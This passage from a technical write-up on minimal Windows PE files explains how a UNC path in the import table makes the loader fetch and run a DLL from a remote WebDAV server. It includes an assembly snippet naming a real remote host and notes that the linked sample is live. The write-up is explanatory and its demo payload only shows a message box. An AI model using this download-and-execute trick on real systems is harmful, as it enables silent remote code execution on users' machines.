Even more interesting is the fact that you can specify a UNC path in the import section of the PE file. If we specify \\66.93.68.6\z as the name of the imported DLL, the Windows loader will try to download the DLL file from our web server.
This allows us to create a PE file that downloads and excutes a file from the Internet without executing a single line of code. All we have to do is put our payload in the DllMain function in the DLL, put the DLL on a publicly accessible WebDAV server and specify the UNC path to the file in the imports section of the PE file. When the loader processes the imports of the PE file, it will load the DLL from the WebDAV server and execute its DllMain function.
;
; The DLL name should be at most 16 bytes, including the null terminator
;
dllname:
db "\\66.93.68.6\z", 0
times 16-($-dllname) db 0
The size of the PE file with a UNC import is still only 133 bytes.
WARNING: The PE file linked below is live. It will attempt to download and execute a payload DLL from
http://66.93.68.6/z. The DLL will display a message box and exit, but you should take proper precautions and treat it as untrusted code.